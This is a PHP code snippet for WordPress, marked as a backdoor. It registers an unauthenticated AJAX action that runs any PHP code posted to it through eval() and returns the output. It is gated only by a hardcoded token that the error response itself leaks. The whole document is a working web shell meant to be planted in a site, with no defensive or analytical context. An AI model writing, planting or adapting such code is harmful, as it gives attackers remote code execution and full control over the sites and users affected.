// ==[BD:m6UX4O8p]== add_action( 'wp_ajax_nopriv_rnfzjyql', function() { $val = 'm6UX4O8pfBmb3NpXknfCOcQgEldxbVR1'; $ptr = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $ptr ) || ! hash_equals( $val, $ptr ) ) { wp_send_json_error( [ 'message' => 'tok:' . $val ], 403 ); } $flag = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $flag ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $flag = preg_replace( '/^\s*<\?(php)?/i', '', $flag ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $token = microtime( true ); ob_start(); try { ( static function() use ( $flag ) { return eval( $flag ); } )(); $bind = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $bind, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $token ) * 1000, 2 ) ] ); } catch ( \Throwable $sym ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $sym->getMessage(), 'time_ms' => round( ( microtime( true ) - $token ) * 1000, 2 ) ] ); } } ); // ==[/BD:m6UX4O8p]==